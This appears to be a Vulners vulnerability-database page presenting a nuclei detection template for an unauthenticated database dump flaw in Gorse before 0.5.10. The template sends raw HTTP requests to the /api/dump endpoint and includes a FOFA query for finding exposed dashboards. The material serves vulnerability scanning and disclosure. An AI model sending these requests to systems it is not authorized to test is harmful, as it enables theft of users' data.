Lucene search
K

Gorse < 0.5.10 - Unauthenticated Database Dump

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 4 Views

Gorse before 0.5.10 allows unauthenticated access via empty admin_api_key on dump and restore.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2026-56782
2 Jul 202623:12
githubexploit
GithubExploit
Exploit for CVE-2026-56782
29 Jun 202622:09
githubexploit
ATTACKERKB
CVE-2026-56782
29 Jun 202617:16
attackerkb
Circl
CVE-2026-56782
29 Jun 202618:34
circl
CVE
CVE-2026-56782
29 Jun 202617:16
cve
Cvelist
CVE-2026-56782 Gorse - Unauthenticated Database Dump and Restore via /api/dump and /api/restore Endpoints
29 Jun 202617:16
cvelist
EUVD
EUVD-2026-40158
29 Jun 202617:16
euvd
NVD
CVE-2026-56782
29 Jun 202618:16
nvd
Positive Technologies
PT-2026-53659
29 Jun 202600:00
ptsecurity
Vulnrichment
CVE-2026-56782 Gorse - Unauthenticated Database Dump and Restore via /api/dump and /api/restore Endpoints
29 Jun 202617:16
vulnrichment
Rows per page
id: CVE-2026-56782

info:
  name: Gorse < 0.5.10 - Unauthenticated Database Dump
  author: 0x_Akoko
  severity: critical
  description: |
    Gorse < 0.5.10 contains an authentication bypass caused by empty admin_api_key in /api/dump and /api/restore endpoints, letting unauthenticated remote attackers access and modify protected data, exploit requires default empty admin_api_key configuration.
  impact: |
    Remote attackers can exfiltrate or overwrite the entire database including sensitive user data without authentication.
  remediation: |
    Update to version 0.5.10 or later.
  reference:
    - https://github.com/gorse-io/gorse/issues/1292
    - https://nvd.nist.gov/vuln/detail/CVE-2026-56782
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-56782
    epss-score: 0.03016
    epss-percentile: 0.85797
    cwe-id: CWE-306
  metadata:
    max-request: 2
    verified: true
    vendor: gorse-io
    product: gorse
    fofa-query: title="Gorse Dashboard"
  tags: cve,cve2026,gorse,unauth,exposure,misconfig

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(tolower(body), "gorse")
        condition: and
        internal: true

  - raw:
      - |
        GET /api/dump HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, "application/octet-stream")
          - "!contains(body, 'unauthorized')"
        condition: and
# digest: 4a0a00473045022100b94280bed5e639f2edf3b62d2c808883d8a1150adca0e2e8e120a97560f1c9dd0220738cf76a05a78c8246f7d7aca74726400e4486f03b233c2b0495b6d4384301f5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2026 02:53Current
6Medium risk
Vulners AI Score6
CVSS 49.3
CVSS 3.19.8
EPSS0.03016
SSVC
4